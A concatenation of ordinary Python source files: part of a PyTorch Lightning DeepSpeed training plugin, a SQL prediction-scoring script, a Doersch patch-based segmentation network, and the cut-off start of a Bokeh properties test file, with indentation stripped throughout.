remote_device: Device to instantiate the model on initially (``cpu`` or ``nvme``).
offload_optimizer: Enable offloading optimizer memory and computation to CPU or NVMe
based on ``offload_optimizer_device``.
offload_parameters: When using ZeRO Stage 3, Enable offloading parameter memory and computation
to CPU or NVMe based on ``offload_params_device``.
offload_params_device: When offloading parameters choose the device to offload to, ``cpu`` or ``nvme``.
offload_optimizer_device: When offloading optimizer state choose the device to offload to,
``cpu`` or ``nvme``.
params_buffer_count: Number of buffers in buffer pool for
parameter offloading when ``offload_params_device`` is ``nvme``.
params_buffer_size: Size of buffers in buffer pool for parameter offloading
when ``offload_params_device`` is ``nvme``.
max_in_cpu: Number of parameter elements to maintain in CPU memory when offloading to NVMe is enabled.
nvme_path: Filesystem path for NVMe device for optimizer/parameter state offloading.
optimizer_buffer_count: Number of buffers in buffer pool for optimizer state offloading
when ``offload_optimizer_device`` is set to ``nvme``.
This should be at least the number of states maintained per parameter by the optimizer.
For example, Adam optimizer has 4 states (parameter, gradient, momentum, and variance).
block_size: When using NVMe Offloading, the I/O block size in bytes.
queue_depth: When using NVMe Offloading, the I/O queue depth.
single_submit: When using NVMe Offloading,
submit requests to storage device as multiple individual requests,
as opposed to one block of requests.
overlap_events: When using NVMe Offloading,
submit requests to storage device in an overlapped fashion
without waiting for completion of earlier requests.
thread_count: When using NVMe Offloading,
Intra-request parallelism for each read/write submitted by a user thread.
pin_memory: When using ZeRO stage 3, pin optimizer state memory on CPU.
This could boost throughput at the cost of extra memory overhead.
sub_group_size: When using ZeRO stage 3, defines the number of parameters
within a sub group to offload at a time.
Smaller numbers require more communication, but improve memory efficiency.
contiguous_gradients: Copies gradients to a continuous buffer as they are produced.
Avoids memory fragmentation during backwards. Useful when training large models.
overlap_comm: Overlap the reduction (synchronization) of gradients with the backwards computation.
This is a speed optimization when training across multiple GPUs/machines.
allgather_partitions: All gather updated parameters at the end of training step,
instead of using a series of broadcast collectives.
reduce_scatter: Use reduce/scatter instead of allreduce to average gradients.
allgather_bucket_size: Number of elements to allgather at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
reduce_bucket_size: Number of elements to reduce at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
zero_allow_untested_optimizer: Allow untested optimizers to be used with ZeRO. Currently only Adam is a
DeepSpeed supported optimizer when using ZeRO.
logging_batch_size_per_gpu: Config used in DeepSpeed to calculate verbose timing for logging
on a per sample per second basis (only displayed if logging=logging.INFO).
If set to "auto", the plugin tries to infer this from
the train DataLoader's BatchSampler, else defaults to 1.
To obtain accurate logs when using datasets that do not support batch samplers,
set this to the actual per gpu batch size (trainer.batch_size).
config: Pass in a deepspeed formatted config dict,
or path to a deepspeed config: https://www.deepspeed.ai/docs/config-json.
All defaults will be ignored if a config is passed in.
logging_level: Set logging level for deepspeed.
loss_scale: Loss scaling value for FP16 training.
0.0 results in dynamic loss scaling, otherwise static.
initial_scale_power: Power of the initial dynamic loss scale value. Loss scale is computed
by ``2^initial_scale_power``.
loss_scale_window: Window in which to raise/lower the dynamic FP16 loss scaling value.
hysteresis: FP16 Delay shift in Dynamic Loss scaling.
min_loss_scale: The minimum FP16 dynamic loss scaling value.
partition_activations: Enables partition activation when used with ZeRO stage 3 and model parallelism.
Still requires you to wrap your forward functions in deepspeed.checkpointing.checkpoint.
See `deepspeed tutorial
<https://www.deepspeed.ai/tutorials/megatron/#deepspeed-activation-checkpoints-optional>`_.
cpu_checkpointing: Offloads partitioned activations to CPU if ``partition_activations`` is enabled.
contiguous_memory_optimization: Copies partitioned activations so that they are contiguous in memory.
Not supported by all models.
synchronize_checkpoint_boundary: Insert :func:`torch.cuda.synchronize` at each checkpoint boundary.
load_full_weights: True when loading a single checkpoint file containing the model state dict
when using ZeRO Stage 3. This differs from the DeepSpeed checkpoint which contains shards
per worker.
partition_module: When True, partitions the ``LightningModule`` across devices when using ZeRO Stage 3.
This is the default behaviour to ensure that the entire module is appropriately initialized
for DeepSpeed. When False we do not explicitly convert the model, which is fine if NO layers
or ALL layers are defined in ``configure_sharded_model``. This is useful for layers such as
``torch.nn.RNN`` which do internal logic when moving to device.
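Example (a minimal usage sketch, not part of the original docstring; ``MyLightningModule``
is a placeholder for your own module)::
    from pytorch_lightning import Trainer
    trainer = Trainer(
        gpus=4,
        precision=16,
        plugins=DeepSpeedPlugin(stage=3, offload_optimizer=True, offload_parameters=True),
    )
    trainer.fit(MyLightningModule())
The registered shorthand strings configure the same presets, e.g.
``Trainer(plugins="deepspeed_stage_3_offload")`` (see ``register_plugins`` below).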
"""
if not _DEEPSPEED_AVAILABLE:
raise MisconfigurationException(
"To use the DeepSpeed plugin, you must have DeepSpeed installed. pip install deepspeed"
)
super().__init__(
parallel_devices=parallel_devices,
num_nodes=num_nodes,
cluster_environment=cluster_environment,
)
self.config = self._load_config(config)
if self.config is None:
# User has not overridden config, set defaults
self.config = self._create_default_config(
zero_optimization,
zero_allow_untested_optimizer,
logging_batch_size_per_gpu,
offload_optimizer=offload_optimizer,
offload_parameters=offload_parameters,
nvme_path=nvme_path,
offload_params_device=offload_params_device,
params_buffer_count=params_buffer_count,
params_buffer_size=params_buffer_size,
max_in_cpu=max_in_cpu,
pin_memory=pin_memory,
offload_optimizer_device=offload_optimizer_device,
optimizer_buffer_count=optimizer_buffer_count,
block_size=block_size,
queue_depth=queue_depth,
single_submit=single_submit,
overlap_events=overlap_events,
thread_count=thread_count,
partition_activations=partition_activations,
cpu_checkpointing=cpu_checkpointing,
contiguous_memory_optimization=contiguous_memory_optimization,
synchronize_checkpoint_boundary=synchronize_checkpoint_boundary,
stage=stage,
contiguous_gradients=contiguous_gradients,
overlap_comm=overlap_comm,
allgather_partitions=allgather_partitions,
reduce_scatter=reduce_scatter,
allgather_bucket_size=allgather_bucket_size,
reduce_bucket_size=reduce_bucket_size,
sub_group_size=sub_group_size,
)
self._config_initialized = False
deepspeed.utils.logging.logger.setLevel(logging_level)
self.remote_device = remote_device
self.load_full_weights = load_full_weights
self.partition_module = partition_module
# default FP16 parameters.
self.loss_scale = loss_scale
self.initial_scale_power = initial_scale_power
self.loss_scale_window = loss_scale_window
self.hysteresis = hysteresis
self.min_loss_scale = min_loss_scale
def _load_config(self, config):
if config is None and self.DEEPSPEED_ENV_VAR in os.environ:
rank_zero_info(f"Loading DeepSpeed config from set {self.DEEPSPEED_ENV_VAR} environment variable")
config = os.environ[self.DEEPSPEED_ENV_VAR]
if isinstance(config, (str, Path)):
if not os.path.isfile(config):
raise MisconfigurationException(
f"You passed in a path to a DeepSpeed config but the path does not exist: {config}"
)
with open(config) as f:
config = json.load(f)
return config
def setup_distributed(self):
reset_seed()
# determine which process we are and world size
self.set_world_ranks()
self._init_deepspeed_distributed()
if not self._config_initialized:
self._format_config()
self._config_initialized = True
def _init_deepspeed_distributed(self) -> None:
if platform.system() != "Windows":
# do not set env variables on windows, allow deepspeed to control setup
self._set_node_environment_variables()
log.info(
"initializing deepspeed distributed: "
f"GLOBAL_RANK: {self.global_rank}, "
f"MEMBER: {self.global_rank + 1}/{self.world_size}"
)
deepspeed.init_distributed(
self.torch_distributed_backend, distributed_port=self.cluster_environment.master_port()
)
def _set_node_environment_variables(self) -> None:
os.environ["MASTER_ADDR"] = self.cluster_environment.master_address()
os.environ["MASTER_PORT"] = str(self.cluster_environment.master_port())
os.environ["RANK"] = str(self.global_rank)
os.environ["WORLD_SIZE"] = str(self.world_size)
os.environ["LOCAL_RANK"] = str(self.local_rank)
@property
def restore_checkpoint_after_pre_dispatch(self) -> bool:
return True
def pre_dispatch(self):
self.init_deepspeed()
self.barrier()
def init_deepspeed(self):
accumulation_scheduler = self.lightning_module.trainer.accumulation_scheduler
if accumulation_scheduler.epochs != [0]:
raise MisconfigurationException(
"DeepSpeed currently does not support different `accumulate_grad_batches` at different epochs."
)
precision = self.lightning_module.trainer.accelerator.precision
model = LightningDeepSpeedModule(pl_module=self.model, precision=precision)
if self.zero_stage_3 and self.partition_module:
# Ensure the entire model has been moved to the appropriate device
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
deepspeed.zero.Init(
module=model, remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
if self.lightning_module.trainer and self.lightning_module.trainer.training:
self._initialize_deepspeed_train(model)
else:
self._initialize_deepspeed_inference(model)
def _init_optimizers(self) -> Tuple[Optimizer, Optional[Union[LRSchedulerTypeTuple]], Optional[int]]:
optimizers, schedulers, optimizer_frequencies = self.lightning_module.trainer.init_optimizers(
self.lightning_module
)
if len(optimizers) > 1 or len(schedulers) > 1:
raise MisconfigurationException(
"DeepSpeed currently only supports single optimizer, single optional scheduler."
)
return (
optimizers[0],
schedulers[0] if schedulers else _get_default_scheduler_config(),
optimizer_frequencies[0] if optimizer_frequencies else None,
)
@property
def zero_stage_3(self) -> bool:
return self.config.get("zero_optimization") and self.config.get("zero_optimization").get("stage") == 3
def _initialize_deepspeed_train(self, model):
if "optimizer" in self.config:
optimizer, lr_scheduler = None, _get_default_scheduler_config()
else:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
model_parameters = filter(lambda p: p.requires_grad, self.model.parameters())
model, deepspeed_optimizer, _, deepspeed_scheduler = deepspeed.initialize(
config=self.config,
model=model,
model_parameters=model_parameters,
optimizer=optimizer,
lr_scheduler=scheduler,
dist_init_required=False,
)
self._set_deepspeed_activation_checkpointing()
# although we set these here, deepspeed manages the specific optimizer logic
self.lightning_module.trainer.optimizers = [deepspeed_optimizer]
deepspeed_scheduler = model.lr_scheduler
if deepspeed_scheduler is not None:
# disable deepspeed lr scheduling as lightning manages scheduling
model.lr_scheduler = None
lr_scheduler["scheduler"] = deepspeed_scheduler
self.lightning_module.trainer.lr_schedulers = [lr_scheduler]
self.model = model
@contextlib.contextmanager
def model_sharded_context(self) -> Generator[None, None, None]:
if self.zero_stage_3:
assert self._config_initialized
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
model_parallel_context = deepspeed.zero.Init(
remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
else:
model_parallel_context = super().model_sharded_context()
with model_parallel_context:
yield
@property
def precision(self) -> Union[str, int]:
return self.lightning_module.trainer.precision
def _set_deepspeed_activation_checkpointing(self):
if self.config.get("activation_checkpointing"):
checkpoint_config = self.config["activation_checkpointing"]
deepspeed.checkpointing.configure(
mpu_=None,
partition_activations=checkpoint_config.get("partition_activations"),
contiguous_checkpointing=checkpoint_config.get("contiguous_checkpointing"),
checkpoint_in_cpu=checkpoint_config.get("checkpoint_in_cpu"),
profile=checkpoint_config.get("profile"),
)
def _initialize_deepspeed_inference(self, model):
# todo: Currently DeepSpeed requires optimizers at inference to partition weights correctly
optimizer, scheduler = None, None
if "optimizer" not in self.config:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
inference_config = {
# todo: this is required for DeepSpeed throughput timers, or throughput timers will be incorrect
"train_micro_batch_size_per_gpu": 1
}
if "fp16" in self.config:
inference_config.update({"fp16": self.config["fp16"]})
if self.zero_stage_3:
inference_config.update(
{
"zero_allow_untested_optimizer": self.config["zero_allow_untested_optimizer"],
"zero_optimization": self.config["zero_optimization"],
}
)
# Remove all module hooks before initializing new model
remove_module_hooks(model)
model, _, _, _ = deepspeed.initialize(
config=inference_config,
model=model,
optimizer=optimizer,
lr_scheduler=scheduler,
model_parameters=[],
dist_init_required=False,
)
self.model = model
@property
def lightning_module(self):
# the model may not be wrapped with DeepSpeedEngine & LightningDeepSpeedModule if calling this too early
module = getattr(self.model, "module", self.model)
return module.module if isinstance(module, LightningDeepSpeedModule) else module
@property
def distributed_sampler_kwargs(self):
distributed_sampler_kwargs = dict(num_replicas=self.world_size, rank=self.global_rank)
return distributed_sampler_kwargs
def init_optimizers(self, trainer: "pl.Trainer", model: "pl.LightningModule") -> Tuple[List, List, List]:
# Skip initializing optimizers here as DeepSpeed handles optimizers via config.
# User may have specified config options instead in configure_optimizers, but this is handled
# via `_initialize_deepspeed_train`
return [], [], [] # empty optimizers, schedulers and frequencies
def optimizer_step(self, optimizer: torch.optim.Optimizer, lambda_closure: Callable, **kwargs):
# note: We rely on the deepspeed engine to carry out the step rather than the optimizer.
# internally, the engine has a reference to the optimizer already.
self.model.step(**kwargs)
@property
def handles_gradient_accumulation(self) -> bool:
"""Whether the plugin handles gradient accumulation internally."""
return True
def _format_config(self):
if self.config is None:
raise MisconfigurationException(
"To use DeepSpeed you must pass in a DeepSpeed config dict, or a path to a JSON config."
" See: https://pytorch-lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed"
)
self._format_batch_size_and_grad_accum_config()
self._format_precision_config()
def _format_batch_size_and_grad_accum_config(self):
if "gradient_accumulation_steps" in self.config:
raise MisconfigurationException(
"Do not set `gradient_accumulation_steps` in the DeepSpeed config"
" as this will be set with the `accumulate_grad_batches` argument passed via the Lightning Trainer."
)
self.config["gradient_accumulation_steps"] = self.lightning_module.trainer.accumulate_grad_batches
if "train_micro_batch_size_per_gpu" not in self.config:
rank_zero_warn(
"Inferring the batch size for internal deepspeed logging from the `train_dataloader()`. "
"If you require skipping this, please pass "
"`Trainer(plugins=DeepSpeedPlugin(logging_batch_size_per_gpu=batch_size))`"
)
batch_size = self._auto_select_batch_size()
self.config["train_micro_batch_size_per_gpu"] = batch_size
if "gradient_clipping" not in self.config:
self.config["gradient_clipping"] = self.lightning_module.trainer.gradient_clip_val
def _auto_select_batch_size(self):
# train_micro_batch_size_per_gpu is used for throughput logging purposes
# by default we try to use the batch size of the loader
batch_size = 1
if hasattr(self.lightning_module, "train_dataloader"):
train_dataloader = self.lightning_module.train_dataloader()
if hasattr(train_dataloader, "batch_sampler"):
batch_size = train_dataloader.batch_sampler.batch_size
return batch_size
def _format_precision_config(self):
amp_type = self.lightning_module.trainer.accelerator_connector.amp_type
amp_level = self.lightning_module.trainer.accelerator_connector.amp_level
precision = self.lightning_module.trainer.accelerator_connector.precision
if precision in (16, "mixed"):
if "fp16" not in self.config and amp_type == AMPType.NATIVE:
# FP16 is a DeepSpeed standalone AMP implementation
rank_zero_info("Enabling DeepSpeed FP16.")
self.config["fp16"] = {
"enabled": True,
"loss_scale": self.loss_scale,
"initial_scale_power": self.initial_scale_power,
"loss_scale_window": self.loss_scale_window,
"hysteresis": self.hysteresis,
"min_loss_scale": self.min_loss_scale,
}
elif "amp" not in self.config and amp_type == AMPType.APEX:
rank_zero_info("Enabling DeepSpeed APEX Implementation.")
self.config["amp"] = {"enabled": True, "opt_level": amp_level}
def _create_default_config(
self,
zero_optimization: bool,
zero_allow_untested_optimizer: bool,
logging_batch_size_per_gpu: Union[str, int],
partition_activations: bool,
cpu_checkpointing: bool,
contiguous_memory_optimization: bool,
synchronize_checkpoint_boundary: bool,
offload_optimizer: bool,
offload_parameters: bool,
nvme_path: str,
offload_params_device: str,
params_buffer_count: int,
params_buffer_size: int,
max_in_cpu: int,
offload_optimizer_device: str,
optimizer_buffer_count: int,
pin_memory: bool,
block_size: int,
queue_depth: int,
single_submit: bool,
overlap_events: bool,
thread_count: int,
**zero_kwargs,
) -> Dict:
cfg = {
"activation_checkpointing": {
"partition_activations": partition_activations,
"cpu_checkpointing": cpu_checkpointing,
"contiguous_memory_optimization": contiguous_memory_optimization,
"synchronize_checkpoint_boundary": synchronize_checkpoint_boundary,
},
"aio": {
"block_size": block_size,
"queue_depth": queue_depth,
"single_submit": single_submit,
"overlap_events": overlap_events,
"thread_count": thread_count,
},
}
if zero_optimization:
zero_config = zero_kwargs
if offload_optimizer:
zero_config["offload_optimizer"] = {
"device": offload_optimizer_device,
"nvme_path": nvme_path,
"buffer_count": optimizer_buffer_count,
"pin_memory": pin_memory,
}
if offload_parameters:
zero_config["offload_param"] = {
"device": offload_params_device,
"nvme_path": nvme_path,
"buffer_count": params_buffer_count,
"buffer_size": params_buffer_size,
"max_in_cpu": max_in_cpu,
"pin_memory": pin_memory,
}
cfg = {
"zero_allow_untested_optimizer": zero_allow_untested_optimizer,
"zero_optimization": zero_config,
**cfg,
}
if logging_batch_size_per_gpu != "auto":
cfg = {"train_micro_batch_size_per_gpu": logging_batch_size_per_gpu, **cfg}
return cfg
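# For reference, with ``zero_optimization=True`` the dict assembled above has roughly this shape
# (the offload sub-dicts appear only when the corresponding flags are set):
# {
#     "zero_allow_untested_optimizer": ...,
#     "zero_optimization": {**zero_kwargs, "offload_optimizer": {...}, "offload_param": {...}},
#     "activation_checkpointing": {...},
#     "aio": {...},
#     "train_micro_batch_size_per_gpu": ...,  # only if logging_batch_size_per_gpu != "auto"
# }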
@property
def deepspeed_engine(self):
return self.model
@property
def _multi_device(self) -> bool:
return self.num_processes > 1 or self.num_nodes > 1
def save_checkpoint(self, checkpoint: Dict, filepath: _PATH) -> None:
"""Save model/training states as a checkpoint file through state-dump and file-write.
Args:
checkpoint: The checkpoint state dictionary
filepath: write-target file's path
"""
if self.zero_stage_3 and self._multi_device and self.is_global_zero:
warning_cache.warn(
"When saving the DeepSpeed Stage 3 checkpoint, "
"each worker will save a shard of the checkpoint within a directory. "
"If a single file is required after training, "
"see https://pytorch-lightning.readthedocs.io/en/latest/advanced/advanced_gpu.html#"
"deepspeed-zero-stage-3-single-file for instructions."
)
# Use deepspeed's internal checkpointing function to handle partitioned weights across processes
# dump states as a checkpoint dictionary object
_exclude_keys = ["state_dict", "optimizer_states", "lr_schedulers"]
checkpoint = {k: v for k, v in checkpoint.items() if k not in _exclude_keys}
self.deepspeed_engine.save_checkpoint(filepath, client_state=checkpoint)
def load_checkpoint(self, checkpoint_path: _PATH) -> Dict[str, Any]:
if self.load_full_weights and self.zero_stage_3:
# Broadcast to ensure we load from the rank 0 checkpoint
# This doesn't have to be the case when using deepspeed sharded checkpointing
checkpoint_path = self.broadcast(checkpoint_path)
return super().load_checkpoint(checkpoint_path)
# Rely on deepspeed to load the checkpoint and necessary information
from pytorch_lightning.trainer.states import TrainerFn
is_fitting = self.lightning_module.trainer.state.fn == TrainerFn.FITTING
_, client_state = self.deepspeed_engine.load_checkpoint(
checkpoint_path, load_optimizer_states=is_fitting, load_lr_scheduler_states=is_fitting
)
if client_state is None:
raise MisconfigurationException(
"DeepSpeed was unable to load the checkpoint. Ensure you passed in a DeepSpeed compatible checkpoint "
"or a single checkpoint file with `Trainer(plugins=DeepSpeedPlugin(load_full_weights=True))`."
)
return client_state
@property
def lightning_restore_optimizer_and_schedulers(self) -> bool:
# managed by DeepSpeed
if self.load_full_weights and self.zero_stage_3 and self.lightning_module.trainer.state.fn == TrainerFn.FITTING:
rank_zero_warn(
"A single checkpoint file has been given. This means optimizer states and "
"scheduler states can not be restored. If you'd like to restore these states, you must "
"provide a path to the originally saved DeepSpeed checkpoint."
)
return False
def load_model_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the weights in `load_checkpoint()`
if self.load_full_weights and self.zero_stage_3:
self.model_to_device()
self._restore_zero_state(checkpoint)
def _restore_zero_state(self, ckpt: Mapping[str, Any]) -> None:
"""Overrides the normal load_state_dict behaviour in PyTorch to ensure we gather parameters that may be
sharded across processes before loading the state dictionary when using ZeRO stage 3. This is then
automatically synced across processes.
Args:
ckpt: The ckpt file.
"""
def load(module: torch.nn.Module, prefix=""):
missing_keys = []
unexpected_keys = []
error_msgs = []
state_dict = ckpt["state_dict"]
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, "_metadata", None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
# because zero3 puts placeholders in model params, this context
# manager gathers (unpartitions) the params of the current layer, then loads from
# the state dict and then re-partitions them again
with deepspeed.zero.GatheredParameters(list(module.parameters(recurse=False)), modifier_rank=0):
if self.is_global_zero:
module._load_from_state_dict(
state_dict=state_dict,
prefix=prefix,
local_metadata=local_metadata,
strict=True,
missing_keys=missing_keys,
unexpected_keys=unexpected_keys,
error_msgs=error_msgs,
)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + ".")
load(self.lightning_module, prefix="")
def load_optimizer_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the states in `load_checkpoint()`
pass
@classmethod
def register_plugins(cls, plugin_registry: Dict) -> None:
plugin_registry.register("deepspeed", cls, description="Default DeepSpeed Plugin")
plugin_registry.register("deepspeed_stage_1", cls, description="DeepSpeed with ZeRO Stage 1 enabled", stage=1)
plugin_registry.register("deepspeed_stage_2", cls, description="DeepSpeed with ZeRO Stage 2 enabled", stage=2)
plugin_registry.register(
"deepspeed_stage_2_offload",
cls,
description="DeepSpeed ZeRO Stage 2 and CPU Offload",
stage=2,
offload_optimizer=True,
)
plugin_registry.register("deepspeed_stage_3", cls, description="DeepSpeed ZeRO Stage 3", stage=3)
plugin_registry.register(
"deepspeed_stage_3_offload",
cls,
description="DeepSpeed ZeRO Stage 3 and CPU Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
)
plugin_registry.register(
"deepspeed_stage_3_offload_nvme",
cls,
description="DeepSpeed ZeRO Stage 3 and NVMe Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
remote_device="nvme",
offload_params_device="nvme",
offload_optimizer_device="nvme",
)
@property
def checkpoint_io(self) -> CheckpointIO:
return self._checkpoint_io
@checkpoint_io.setter
def checkpoint_io(self, plugin: CheckpointIO) -> None:
raise MisconfigurationException("DeepSpeed currently does not support custom checkpoint plugins.")
def validation_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def test_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def predict_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
|
# coding=utf8
import os
import re
import json
import argparse
from sql.evaluator import compare_sqls
def evaluate(path, timeout=120):
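"""Score predictions by comparing predicted and gold SQL logical forms.
A sketch of the expected input, inferred from the keys read below: ``path`` points to a JSON
file holding a list of records, each with ``truth_logical_form`` and ``predicted_logical_form``
strings. ``timeout`` is currently unused.
"""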
with open(path, 'r') as f:
predictions = json.load(f)
total = len(predictions)
correct = 0
for pidx, p in enumerate(predictions):
truth = p['truth_logical_form']
pred = p['predicted_logical_form']
if compare_sqls(truth, pred):
correct += 1
print("Total: %d, Correct: %d, Accuracy: %f" %
(total, correct, float(correct / total)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--predictions', help='file that stores the prediction results', required=True)
args = parser.parse_args()
evaluate(args.predictions)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from proj.archs.cluster.vgg import VGGNet
from proj.archs.segmentation.net10a import SegmentationNet10aTrunk, \
SegmentationNet10a
from proj.utils.segmentation.baselines.general import get_patches
__all__ = ["SegmentationNet10aDoersch"]
class DoerschHead(nn.Module):
def __init__(self, config):
super(DoerschHead, self).__init__()
self.patch_side = config.doersch_patch_side
self.siamese_branch = nn.Sequential(
nn.Conv2d(in_channels=SegmentationNet10a.cfg[-1][0], out_channels=1024,
kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True)
)
self.joint = nn.Sequential(
nn.Linear(2 * 1024 * self.patch_side * self.patch_side, 1024),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(1024, 9) # 9 gt positions, N, NE... NW.
)
def forward(self, patches1, patches2):
patches1 = self.siamese_branch(patches1)
patches2 = self.siamese_branch(patches2)
ni, k, h, w = patches1.size()
ni2, k2, h2, w2 = patches2.size()
if not ((ni == ni2) and (k == k2) and (h == h2) and (w == w2) and \
(h == self.patch_side) and (w == self.patch_side)):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
assert (False)
# flatten all but first dim
patches1 = patches1.contiguous() # otherwise view may behave funny
patches2 = patches2.contiguous()
patches1 = patches1.view(patches1.size(0), -1)
patches2 = patches2.view(patches2.size(0), -1)
concatenated = torch.cat((patches1, patches2), dim=1)
ni3, nf = concatenated.size()
if not ((ni3 == ni) and (nf == (2 * 1024 * self.patch_side *
self.patch_side))):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
print(patches1.size())
print(patches2.size())
print(ni3, nf)
assert (False)
return self.joint(concatenated)
class SegmentationNet10aDoersch(VGGNet):
def __init__(self, config):
super(SegmentationNet10aDoersch, self).__init__()
self.patch_side = config.doersch_patch_side
self.input_sz = config.input_sz
self.features_sz = SegmentationNet10a.cfg[-1][0]
print("SegmentationNet10aDoersch: %d %d %d" % (self.patch_side,
self.input_sz,
self.features_sz))
self.features = SegmentationNet10aTrunk(config, cfg=SegmentationNet10a.cfg)
self.doersch_head = DoerschHead(config)
self._initialize_weights()
def forward(self, x, centre=None, other=None, penultimate=False):
x = self.features(x)
x = F.interpolate(x, size=self.input_sz, mode="bilinear")
if not penultimate:
assert ((centre is not None) and (other is not None))
patches1, patches2 = \
get_patches(x, centre, other, self.patch_side)
# predicted position distribution, no softmax - using
# torch.CrossEntropyLoss
# shape: bn, 9
x = self.doersch_head(patches1, patches2)
return x
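# Hedged usage sketch (not part of the original code): the Doersch head returns raw logits of
# shape (batch, 9), so a plain cross-entropy loss applies directly. `net`, `imgs`, `centre`,
# `other` and `gt_positions` are hypothetical placeholders.
def _example_doersch_loss(net, imgs, centre, other, gt_positions):
    logits = net(imgs, centre=centre, other=other)  # (batch, 9), no softmax applied
    return F.cross_entropy(logits, gt_positions)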
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
import numpy as np
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.has_props import HasProps
from bokeh.core.properties import (
Alias,
Dict,
Enum,
Float,
Instance,
Int,
List,
Nullable,
NumberSpec,
Override,
String,
)
from bokeh.models import Plot
# Module under test
import bokeh.core.properties as bcp # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'Alias',
'Alpha',
'AlphaSpec',
'Angle',
'AngleSpec',
'Any',
'AnyRef',
'Array',
'Auto',
'Base64String',
'Bool',
'Byte',
'Color',
'ColorHex',
'ColorSpec',
'ColumnData',
'Complex',
'DashPattern',
'DataSpec',
'Date',
'Datetime',
'Dict',
'DistanceSpec',
'Either',
'Enum',
'Factor',
'FactorSeq',
'Float',
'FontSize',
'FontSizeSpec',
'HatchPatternSpec',
'HatchPatternType',
'Image',
'Include',
'Instance',
'Int',
'Interval',
'JSON',
'List',
'MarkerSpec',
'MarkerType',
'MathString',
'MinMaxBounds',
'NonNegativeInt',
'NonNullable',
'Null',
'NullStringSpec',
'Nullable',
'NumberSpec',
'Override',
'PandasDataFrame',
'PandasGroupBy',
'Percent',
'PositiveInt',
'RGB',
'Readonly',
'Regex',
'RelativeDelta',
'RestrictedDict',
'Seq',
'Size',
'SizeSpec',
'String',
'StringSpec',
'Struct',
'TimeDelta',
'TextLike',
'Tuple',
'UnitsSpec',
'expr',
'field',
'validate',
'value',
'without_property_validation'
)
#-----------------------------------------------------------------------------
# General API
#----------------------------------------------------------------------------
# TODO (bev) These tests should be moved to better places
class TestBasic:
def test_simple_class(self) -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1, 2, 3])
zz = Dict(String, Int)
s = Nullable(String(None))
f = Foo()
assert f.x == 12
assert f.y == "hello"
assert np.array_equal(np.array([1, 2, 3]), f.z)
assert f.s is None
assert {"x", "y", "z", "zz", "s"} == f.properties()
with_defaults = f.properties_with_values(include_defaults=True)
assert dict(x=12, y="hello", z=[1,2,3], zz={}, s=None) == with_defaults
without_defaults = f.properties_with_values(include_defaults=False)
assert dict() == without_defaults
f.x = 18
assert f.x == 18
f.y = "bar"
assert f.y == "bar"
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar") == without_defaults
f.z[0] = 100
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3]) == without_defaults
f.zz = {'a': 10}
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3], zz={'a': 10}) == without_defaults
def test_enum(self) -> None:
class Foo(HasProps):
x = Enum("blue", "red", "green") # the first item is the default
y = Enum("small", "medium", "large", default="large")
f = Foo()
assert f.x == "blue"
assert f.y == "large"
f.x = "red"
assert f.x == "red"
with pytest.raises(ValueError):
f.x = "yellow"
f.y = "small"
assert f.y == "small"
with pytest.raises(ValueError):
f.y = "yellow"
def test_inheritance(self) -> None:
class Base(HasProps):
x = Int(12)
y = String("hello")
class Child(Base):
z = Float(3.14)
c = Child()
assert frozenset(['x', 'y', 'z']) == frozenset(c.properties())
assert c.y == "hello"
def test_set(self) -> None:
class Foo(HasProps):
x = Int(12)
y = Enum("red", "blue", "green")
z = String("blah")
f = Foo()
assert f.x == 12
assert f.y == "red"
assert f.z == "blah"
f.update(**dict(x=20, y="green", z="hello"))
assert f.x == 20
assert f.y == "green"
assert f.z == "hello"
with pytest.raises(ValueError):
f.update(y="orange")
def test_accurate_properties_sets(self) -> None:
class Base(HasProps):
num = Int(12)
container = List(String)
child = Instance(HasProps)
class Mixin(HasProps):
mixin_num = Int(12)
mixin_container = List(String)
mixin_child = Instance(HasProps)
class Sub(Base, Mixin):
